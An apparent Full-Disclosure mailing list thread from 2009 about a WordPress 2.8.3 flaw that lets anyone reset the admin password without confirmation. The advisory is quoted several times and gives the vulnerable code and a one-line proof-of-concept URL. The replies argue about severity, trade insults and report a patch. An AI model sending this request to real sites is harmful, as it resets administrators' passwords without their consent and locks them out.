>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>> --
>>
>> If you have questions please let me know.
>> Best regards,
>> - Fábio - IT Manager
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Very nice Laurent. That will hurt many ppl

laurent wrote,
> =============================================
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =============================================

> I. VULNERABILITY
> -------------------------
> WordPress <= 2.8.3 Remote admin reset password

> II. BACKGROUND
> -------------------------
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.

> III. DESCRIPTION
> -------------------------
> The way Wordpress handle a password reset looks like this:
> You submit your email adress or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress send you a reset confirmation like that via email:

> "
> Someone has asked to reset the password for the following site and username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen

> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "

> You click on the link, and then Wordpress reset your admin password, and
> sends you over another email with your new credentials.

> Let's see how it works:


> wp-login.php:
> ...[snip]....
> line 186:
> function reset_password($key) {
> global $wpdb;

> $key = preg_replace('/[^a-z0-9]/i', '', $key);

> if ( empty( $key ) )
> return new WP_Error('invalid_key', __('Invalid key'));

> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> user_activation_key = %s", $key));
> if ( empty( $user ) )
> return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]....
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();

> if ( isset($_GET['key']) )
> $action = 'resetpass';

> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> 'resetpass', 'rp', 'register', 'login')) && false ===
> has_filter('login_form_' . $action) )
> $action = 'login';
> ...[snip]....

> line 370:

> break;

> case 'resetpass' :
> case 'rp' :
> $errors = reset_password($_GET['key']);

> if ( ! is_wp_error($errors) ) {
> wp_redirect('wp-login.php?checkemail=newpass');
> exit();
> }

> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> exit();

> break;
> ...[snip ]...

> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submiting an array to the $key variable.


> IV. PROOF OF CONCEPT
> -------------------------
> A web browser is sufficiant to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
> The password will be reset without any confirmation.

> V. BUSINESS IMPACT
> -------------------------
> An attacker could exploit this vulnerability to compromise the admin account
> of any wordpress/wordpress-mu <= 2.8.3

> VI. SYSTEMS AFFECTED
> -------------------------
> All

> VII. SOLUTION
> -------------------------
> No patch aviable for the moment.

> VIII. REFERENCES
> -------------------------
> http://www.wordpress.org

> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> I'd like to shoot some greetz to securityreason.com for them great research
> on PHP, as for this under-estimated vulnerability discovered by Maksymilian
> Arciemowicz :
> http://securityreason.com/achievement_securityalert/38

> X. REVISION HISTORY
> -------------------------
> August 10th, 2009: Initial release

> XI. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Well, i dont think so, that's why i published this.
It very limitated.
It's true, someone can make a loop script and avoid any possibility to log
back on your wordpress blog, but you also can avoid that functionality
easily, you just need to comment out 1 line.
Anyways, a patch should come out soon.

Regards Laurent Gaffié




2009/8/10 ehmo <diskusie@gmail.com>

> Very nice Laurent. That will hurt many ppl
>
> laurent wrote,
> > =============================================
> > - Release date: August 10th, 2009
> > - Discovered by: Laurent Gaffié
> > - Severity: Medium
> > =============================================
>
> > I. VULNERABILITY
> > -------------------------
> > WordPress <= 2.8.3 Remote admin reset password
>
> > II. BACKGROUND
> > -------------------------
> > WordPress is a state-of-the-art publishing platform with a focus on
> > aesthetics, web standards, and usability.
> > WordPress is both free and priceless at the same time.
> > More simply, WordPress is what you use when you want to work with your
> > blogging software, not fight it.
>
> > III. DESCRIPTION
> > -------------------------
> > The way Wordpress handle a password reset looks like this:
> > You submit your email adress or username via this form
> > /wp-login.php?action=lostpassword ;
> > Wordpress send you a reset confirmation like that via email:
>
> > "
> > Someone has asked to reset the password for the following site and
> username.
> > http://DOMAIN_NAME.TLD/wordpress
> > Username: admin
> > To reset your password visit the following address, otherwise just ignore
> > this email and nothing will happen
>
> >
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > "
>
> > You click on the link, and then Wordpress reset your admin password, and
> > sends you over another email with your new credentials.
>
> > Let's see how it works:
>
>
> > wp-login.php:
> > ...[snip]....
> > line 186:
> > function reset_password($key) {
> > global $wpdb;
>
> > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> > if ( empty( $key ) )
> > return new WP_Error('invalid_key', __('Invalid key'));
>
> > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
> WHERE
> > user_activation_key = %s", $key));
> > if ( empty( $user ) )
> > return new WP_Error('invalid_key', __('Invalid key'));
> > ...[snip]....
> > line 276:
> > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > $errors = new WP_Error();
>
> > if ( isset($_GET['key']) )
> > $action = 'resetpass';
>
> > // validate action so as to default to the login screen
> > if ( !in_array($action, array('logout', 'lostpassword',
> 'retrievepassword',
> > 'resetpass', 'rp', 'register', 'login')) && false ===
> > has_filter('login_form_' . $action) )
> > $action = 'login';
> > ...[snip]....
>
> > line 370:
>
> > break;
>
> > case 'resetpass' :
> > case 'rp' :
> > $errors = reset_password($_GET['key']);
>
> > if ( ! is_wp_error($errors) ) {
> > wp_redirect('wp-login.php?checkemail=newpass');
> > exit();
> > }
>
> > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> > exit();
>
> > break;
> > ...[snip ]...
>
> > You can abuse the password reset function, and bypass the first step and
> > then reset the admin password by submiting an array to the $key variable.
>
>
> > IV. PROOF OF CONCEPT
> > -------------------------
> > A web browser is sufficiant to reproduce this Proof of concept:
> > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> > The password will be reset without any confirmation.
>
> > V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to compromise the admin
> account
> > of any wordpress/wordpress-mu <= 2.8.3
>
> > VI. SYSTEMS AFFECTED
> > -------------------------
> > All
>
> > VII. SOLUTION
> > -------------------------
> > No patch aviable for the moment.
>
> > VIII. REFERENCES
> > -------------------------
> > http://www.wordpress.org
>
> > IX. CREDITS
> > -------------------------
> > This vulnerability has been discovered by Laurent Gaffié
> > Laurent.gaffie{remove-this}(at)gmail.com
> > I'd like to shoot some greetz to securityreason.com for them great
> research
> > on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian
> > Arciemowicz :
> > http://securityreason.com/achievement_securityalert/38
>
> > X. REVISION HISTORY
> > -------------------------
> > August 10th, 2009: Initial release
>
> > XI. LEGAL NOTICES
> > -------------------------
> > The information contained within this advisory is supplied "as-is"
> > with no warranties or guarantees of fitness of use or otherwise.
> > I accept no responsibility for any damage caused by the use or
> > misuse of this information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Hi there,
"What would the "attacker" submit as a query to the server?"

Simply:
/wp-login.php?action=rp&key[]=<http://domain_name.tld/wp-login.php?action=rp&key%5B%5D=>

And the admin passwd would be reseted.

Regards.


2009/8/11 Rafal M. Los <rafal@ishackingyou.com>

> Hi Laurent,
> Pardon my stupidity... I seem to be missing something tonight. Can
> you explain a little further for someone who doesn’t have coding (php)
> background? What would the "attacker" submit as a query to the server?
> What specifically triggers the vulnerabiilty?
> .
>
> Rafal M. Los
> Security & IT Risk Strategist
>
> - Blog: http://preachsecurity.blogspot.com
> - LinkedIn: http://www.linkedin.com/in/rmlos
> - Twitter: http://twitter.com/RafalLos
>
> *From:* laurent gaffie <laurent.gaffie@gmail.com>
> *Sent:* Monday, August 10, 2009 9:09 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
> =============================================
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =============================================
>
> I. VULNERABILITY
> -------------------------
> WordPress <= 2.8.3 Remote admin reset password
>
> II. BACKGROUND
> -------------------------
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.
>
> III. DESCRIPTION
> -------------------------
> The way Wordpress handle a password reset looks like this:
> You submit your email adress or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress send you a reset confirmation like that via email:
>
> "
> Someone has asked to reset the password for the following site and
> username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen
>
>
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "
>
> You click on the link, and then Wordpress reset your admin password, and
> sends you over another email with your new credentials.
>
> Let's see how it works:
>
>
> wp-login.php:
> ...[snip]....
> line 186:
> function reset_password($key) {
> global $wpdb;
>
> $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> if ( empty( $key ) )
> return new WP_Error('invalid_key', __('Invalid key'));
>
> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> user_activation_key = %s", $key));
> if ( empty( $user ) )
> return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]....
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();
>
> if ( isset($_GET['key']) )
> $action = 'resetpass';
>
> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> 'resetpass', 'rp', 'register', 'login')) && false ===
> has_filter('login_form_' . $action) )
> $action = 'login';
> ...[snip]....
>
> line 370:
>
> break;
>
> case 'resetpass' :
> case 'rp' :
> $errors = reset_password($_GET['key']);
>
> if ( ! is_wp_error($errors) ) {
> wp_redirect('wp-login.php?checkemail=newpass');
> exit();
> }
>
> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> exit();
>
> break;
> ...[snip ]...
>
> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submiting an array to the $key variable.
>
>
> IV. PROOF OF CONCEPT
> -------------------------
> A web browser is sufficiant to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> The password will be reset without any confirmation.
>
> V. BUSINESS IMPACT
> -------------------------
> An attacker could exploit this vulnerability to compromise the admin
> account of any wordpress/wordpress-mu <= 2.8.3
>
> VI. SYSTEMS AFFECTED
> -------------------------
> All
>
> VII. SOLUTION
> -------------------------
> No patch aviable for the moment.
>
> VIII. REFERENCES
> -------------------------
> http://www.wordpress.org
>
> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> I'd like to shoot some greetz to securityreason.com for them great
> research on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian Arciemowicz :
> http://securityreason.com/achievement_securityalert/38
>
> X. REVISION HISTORY
> -------------------------
> August 10th, 2009: Initial release
>
> XI. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



--
follow me @twitter ! : http://twitter.com/laurentgaffie
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
"Rafal M. Los
Security & IT Risk Strategist"

where ?

@home ?
oh boy.



2009/8/11 Rafal M. Los <rafal@ishackingyou.com>

> Empty reply... on purpose or...?
> .
>
> Rafal
>
> *From:* laurent gaffie <laurent.gaffie@gmail.com>
> *Sent:* Monday, August 10, 2009 11:43 PM
> *To:* Rafal M. Los <rafal@ishackingyou.com>
> *Subject:* Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
>
>
> 2009/8/11 Rafal M. Los <rafal@ishackingyou.com>
>
>> Hi Laurent,
>> Pardon my stupidity... I seem to be missing something tonight. Can
>> you explain a little further for someone who doesn’t have coding (php)
>> background? What would the "attacker" submit as a query to the server?
>> What specifically triggers the vulnerabiilty?
>> .
>>
>> Rafal M. Los
>> Security & IT Risk Strategist
>>
>> - Blog: http://preachsecurity.blogspot.com
>> - LinkedIn: http://www.linkedin.com/in/rmlos
>> - Twitter: http://twitter.com/RafalLos
>>
>> *From:* laurent gaffie <laurent.gaffie@gmail.com>
>> *Sent:* Monday, August 10, 2009 9:09 PM
>> *To:* full-disclosure@lists.grok.org.uk
>> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
>> password
>>
>> =============================================
>> - Release date: August 10th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: Medium
>> =============================================
>>
>> I. VULNERABILITY
>> -------------------------
>> WordPress <= 2.8.3 Remote admin reset password
>>
>> II. BACKGROUND
>> -------------------------
>> WordPress is a state-of-the-art publishing platform with a focus on
>> aesthetics, web standards, and usability.
>> WordPress is both free and priceless at the same time.
>> More simply, WordPress is what you use when you want to work with your
>> blogging software, not fight it.
>>
>> III. DESCRIPTION
>> -------------------------
>> The way Wordpress handle a password reset looks like this:
>> You submit your email adress or username via this form
>> /wp-login.php?action=lostpassword ;
>> Wordpress send you a reset confirmation like that via email:
>>
>> "
>> Someone has asked to reset the password for the following site and
>> username.
>> http://DOMAIN_NAME.TLD/wordpress
>> Username: admin
>> To reset your password visit the following address, otherwise just ignore
>> this email and nothing will happen
>>
>>
>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>> "
>>
>> You click on the link, and then Wordpress reset your admin password, and
>> sends you over another email with your new credentials.
>>
>> Let's see how it works:
>>
>>
>> wp-login.php:
>> ...[snip]....
>> line 186:
>> function reset_password($key) {
>> global $wpdb;
>>
>> $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>
>> if ( empty( $key ) )
>> return new WP_Error('invalid_key', __('Invalid key'));
>>
>> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
>> WHERE user_activation_key = %s", $key));
>> if ( empty( $user ) )
>> return new WP_Error('invalid_key', __('Invalid key'));
>> ...[snip]....
>> line 276:
>> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
>> $errors = new WP_Error();
>>
>> if ( isset($_GET['key']) )
>> $action = 'resetpass';
>>
>> // validate action so as to default to the login screen
>> if ( !in_array($action, array('logout', 'lostpassword',
>> 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false ===
>> has_filter('login_form_' . $action) )
>> $action = 'login';
>> ...[snip]....
>>
>> line 370:
>>
>> break;
>>
>> case 'resetpass' :
>> case 'rp' :
>> $errors = reset_password($_GET['key']);
>>
>> if ( ! is_wp_error($errors) ) {
>> wp_redirect('wp-login.php?checkemail=newpass');
>> exit();
>> }
>>
>> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>> exit();
>>
>> break;
>> ...[snip ]...
>>
>> You can abuse the password reset function, and bypass the first step and
>> then reset the admin password by submiting an array to the $key variable.
>>
>>
>> IV. PROOF OF CONCEPT
>> -------------------------
>> A web browser is sufficiant to reproduce this Proof of concept:
>> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>> The password will be reset without any confirmation.
>>
>> V. BUSINESS IMPACT
>> -------------------------
>> An attacker could exploit this vulnerability to compromise the admin
>> account of any wordpress/wordpress-mu <= 2.8.3
>>
>> VI. SYSTEMS AFFECTED
>> -------------------------
>> All
>>
>> VII. SOLUTION
>> -------------------------
>> No patch aviable for the moment.
>>
>> VIII. REFERENCES
>> -------------------------
>> http://www.wordpress.org
>>
>> IX. CREDITS
>> -------------------------
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>> I'd like to shoot some greetz to securityreason.com for them great
>> research on PHP, as for this under-estimated vulnerability discovered by
>> Maksymilian Arciemowicz :
>> http://securityreason.com/achievement_securityalert/38
>>
>> X. REVISION HISTORY
>> -------------------------
>> August 10th, 2009: Initial release
>>
>> XI. LEGAL NOTICES
>> -------------------------
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> ------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> follow me @twitter ! : http://twitter.com/laurentgaffie
>



--
follow me @twitter ! : http://twitter.com/laurentgaffie
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Dude, your email is more funny, than serious.
It's a pure troll.
What ever from now on.
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Mr Fabio,

You dont even understand the bug, so please shut the hell up.






2009/8/11 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>

> if this is an bug, please close Twitter.com, MSN.com and other services,
> because they have the same stupid "Reset password" service.
>
> So please make my day, and create a stupid script to flood with mutiple
> request to reset password.
>
> LOL
>
> 2009/8/10 Jeremy Brown <0xjbrown41@gmail.com>
>
> I'm guessing your not a Wordpress administrator, Fabio. Nice find
>> Laurent, as usual.
>>
>> On Mon, Aug 10, 2009 at 10:48 PM, laurent
>> gaffie<laurent.gaffie@gmail.com> wrote:
>> > Oh ok.
>> > Then, let's avoid that function.
>> > If it's useless to have a function who validate a reset passwd before
>> > resetting it, let's just avoid it smartass.
>> >
>> >
>> > 2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>> >>
>> >> There is no risk on this.
>> >> It's just a little flaw, it doesn't broke anything or put your admin
>> >> access in risk.
>> >>
>> >> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>> >>
>> >> 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>> >>>
>> >>> Hi there,
>> >>>
>> >>> This wasn't tested on the 2.7* branch.
>> >>> It as been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as
>> an
>> >>> Apache 2.2.12 module, on a linux env.
>> >>>
>> >>>
>> >>> Regards Laurent Gaffié
>> >>>
>> >>>
>> >>>
>> >>> 2009/8/10 Nicolas Valcárcel Scerpella <
>> nicolas.valcarcel@canonical.com>
>> >>>>
>> >>>> I don't see the issue with wp 2.7.1
>> >>>>
>> >>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>> >>>>
>> >>>> > Errata:
>> >>>> >
>> >>>> > "V. BUSINESS IMPACT
>> >>>> > -------------------------
>> >>>> > An attacker could exploit this vulnerability to compromise the
>> admin
>> >>>> > account
>> >>>> > of any wordpress/wordpress-mu <= 2.8.3"
>> >>>> >
>> >>>> > -->
>> >>>> >
>> >>>> > "V. BUSINESS IMPACT
>> >>>> > -------------------------
>> >>>> > An attacker could exploit this vulnerability to reset the admin
>> >>>> > account of
>> >>>> > any wordpress/wordpress-mu <= 2.8.3"
>> >>>> >
>> >>>> >
>> >>>> > Regards Laurent Gaffié
>> >>>> >
>> >>>> >
>> >>>> > 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>> >>>> >
>> >>>> > > =============================================
>> >>>> > > - Release date: August 10th, 2009
>> >>>> > > - Discovered by: Laurent Gaffié
>> >>>> > > - Severity: Medium
>> >>>> > > =============================================
>> >>>> > >
>> >>>> > > I. VULNERABILITY
>> >>>> > > -------------------------
>> >>>> > > WordPress <= 2.8.3 Remote admin reset password
>> >>>> > >
>> >>>> > > II. BACKGROUND
>> >>>> > > -------------------------
>> >>>> > > WordPress is a state-of-the-art publishing platform with a focus
>> on
>> >>>> > > aesthetics, web standards, and usability.
>> >>>> > > WordPress is both free and priceless at the same time.
>> >>>> > > More simply, WordPress is what you use when you want to work with
>> >>>> > > your
>> >>>> > > blogging software, not fight it.
>> >>>> > >
>> >>>> > > III. DESCRIPTION
>> >>>> > > -------------------------
>> >>>> > > The way Wordpress handle a password reset looks like this:
>> >>>> > > You submit your email adress or username via this form
>> >>>> > > /wp-login.php?action=lostpassword ;
>> >>>> > > Wordpress send you a reset confirmation like that via email:
>> >>>> > >
>> >>>> > > "
>> >>>> > > Someone has asked to reset the password for the following site
>> and
>> >>>> > > username.
>> >>>> > > http://DOMAIN_NAME.TLD/wordpress
>> >>>> > > Username: admin
>> >>>> > > To reset your password visit the following address, otherwise
>> just
>> >>>> > > ignore
>> >>>> > > this email and nothing will happen
>> >>>> > >
>> >>>> > >
>> >>>> > >
>> >>>> > >
>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>> >>>> > > "
>> >>>> > >
>> >>>> > > You click on the link, and then Wordpress reset your admin
>> password,
>> >>>> > > and
>> >>>> > > sends you over another email with your new credentials.
>> >>>> > >
>> >>>> > > Let's see how it works:
>> >>>> > >
>> >>>> > >
>> >>>> > > wp-login.php:
>> >>>> > > ...[snip]....
>> >>>> > > line 186:
>> >>>> > > function reset_password($key) {
>> >>>> > > global $wpdb;
>> >>>> > >
>> >>>> > > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>> >>>> > >
>> >>>> > > if ( empty( $key ) )
>> >>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>> >>>> > >
>> >>>> > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM
>> >>>> > > $wpdb->users WHERE
>> >>>> > > user_activation_key = %s", $key));
>> >>>> > > if ( empty( $user ) )
>> >>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>> >>>> > > ...[snip]....
>> >>>> > > line 276:
>> >>>> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] :
>> >>>> > > 'login';
>> >>>> > > $errors = new WP_Error();
>> >>>> > >
>> >>>> > > if ( isset($_GET['key']) )
>> >>>> > > $action = 'resetpass';
>> >>>> > >
>> >>>> > > // validate action so as to default to the login screen
>> >>>> > > if ( !in_array($action, array('logout', 'lostpassword',
>> >>>> > > 'retrievepassword',
>> >>>> > > 'resetpass', 'rp', 'register', 'login')) && false ===
>> >>>> > > has_filter('login_form_' . $action) )
>> >>>> > > $action = 'login';
>> >>>> > > ...[snip]....
>> >>>> > >
>> >>>> > > line 370:
>> >>>> > >
>> >>>> > > break;
>> >>>> > >
>> >>>> > > case 'resetpass' :
>> >>>> > > case 'rp' :
>> >>>> > > $errors = reset_password($_GET['key']);
>> >>>> > >
>> >>>> > > if ( ! is_wp_error($errors) ) {
>> >>>> > > wp_redirect('wp-login.php?checkemail=newpass');
>> >>>> > > exit();
>> >>>> > > }
>> >>>> > >
>> >>>> > >
>> >>>> > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>> >>>> > > exit();
>> >>>> > >
>> >>>> > > break;
>> >>>> > > ...[snip ]...
>> >>>> > >
>> >>>> > > You can abuse the password reset function, and bypass the first
>> step
>> >>>> > > and
>> >>>> > > then reset the admin password by submiting an array to the $key
>> >>>> > > variable.
>> >>>> > >
>> >>>> > >
>> >>>> > > IV. PROOF OF CONCEPT
>> >>>> > > -------------------------
>> >>>> > > A web browser is sufficiant to reproduce this Proof of concept:
>> >>>> > >
>> >>>> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>> <http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>> >>>> > > The password will be reset without any confirmation.
>> >>>> > >
>> >>>> > > V. BUSINESS IMPACT
>> >>>> > > -------------------------
>> >>>> > > An attacker could exploit this vulnerability to compromise the
>> admin
>> >>>> > > account of any wordpress/wordpress-mu <= 2.8.3
>> >>>> > >
>> >>>> > > VI. SYSTEMS AFFECTED
>> >>>> > > -------------------------
>> >>>> > > All
>> >>>> > >
>> >>>> > > VII. SOLUTION
>> >>>> > > -------------------------
>> >>>> > > No patch aviable for the moment.
>> >>>> > >
>> >>>> > > VIII. REFERENCES
>> >>>> > > -------------------------
>> >>>> > > http://www.wordpress.org
>> >>>> > >
>> >>>> > > IX. CREDITS
>> >>>> > > -------------------------
>> >>>> > > This vulnerability has been discovered by Laurent Gaffié
>> >>>> > > Laurent.gaffie{remove-this}(at)gmail.com
>> >>>> > > I'd like to shoot some greetz to securityreason.com for them
>> great
>> >>>> > > research on PHP, as for this under-estimated vulnerability
>> >>>> > > discovered by
>> >>>> > > Maksymilian Arciemowicz :
>> >>>> > > http://securityreason.com/achievement_securityalert/38
>> >>>> > >
>> >>>> > > X. REVISION HISTORY
>> >>>> > > -------------------------
>> >>>> > > August 10th, 2009: Initial release
>> >>>> > >
>> >>>> > > XI. LEGAL NOTICES
>> >>>> > > -------------------------
>> >>>> > > The information contained within this advisory is supplied
>> "as-is"
>> >>>> > > with no warranties or guarantees of fitness of use or otherwise.
>> >>>> > > I accept no responsibility for any damage caused by the use or
>> >>>> > > misuse of this information.
>> >>>> > >
>> >>>>
>> >>>> > _______________________________________________
>> >>>> > Full-Disclosure - We believe in it.
>> >>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >>>>
>> >>>> --
>> >>>> Nicolas Valcárcel
>> >>>> Security Engineer
>> >>>> Custom Engineering Solutions Group
>> >>>> Canonical OEM Services
>> >>>> Mobile: +511 994 293 200
>> >>>> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9 DD12 524E C3CD EF58 4970
>> >>>> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>> >>>>
>> >>>> -----BEGIN PGP SIGNATURE-----
>> >>>> Version: GnuPG v1.4.9 (GNU/Linux)
>> >>>>
>> >>>> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
>> >>>> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
>> >>>> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
>> >>>> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
>> >>>> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
>> >>>> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
>> >>>> =UdOl
>> >>>> -----END PGP SIGNATURE-----
>> >>>>
>> >>>
>> >>>
>> >>> _______________________________________________
>> >>> Full-Disclosure - We believe in it.
>> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> >>
>> >>
>> >> --
>> >>
>> >> If you have questions please let me know.
>> >> Best regards,
>> >> - Fábio - IT Manager
>> >
>> >
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
>
> If you have questions please let me know.
> Best regards,
> - Fábio - IT Manager
>



--
follow me @twitter ! : http://twitter.com/laurentgaffie
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Bug is confirmed...

WP team already issued and a patch
http://core.trac.wordpress.org/changeset/11798

Nice find.

Regards

2009/8/11 laurent gaffie <laurent.gaffie@gmail.com>:
> Mr Fabio,
>
> You dont even understand the bug, so please shut the hell up.
>
>
>
>
>
>
> 2009/8/11 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>>
>> if this is an bug, please close Twitter.com, MSN.com and other services,
>> because they have the same stupid "Reset password" service.
>>
>> So please make my day, and create a stupid script to flood with mutiple
>> request to reset password.
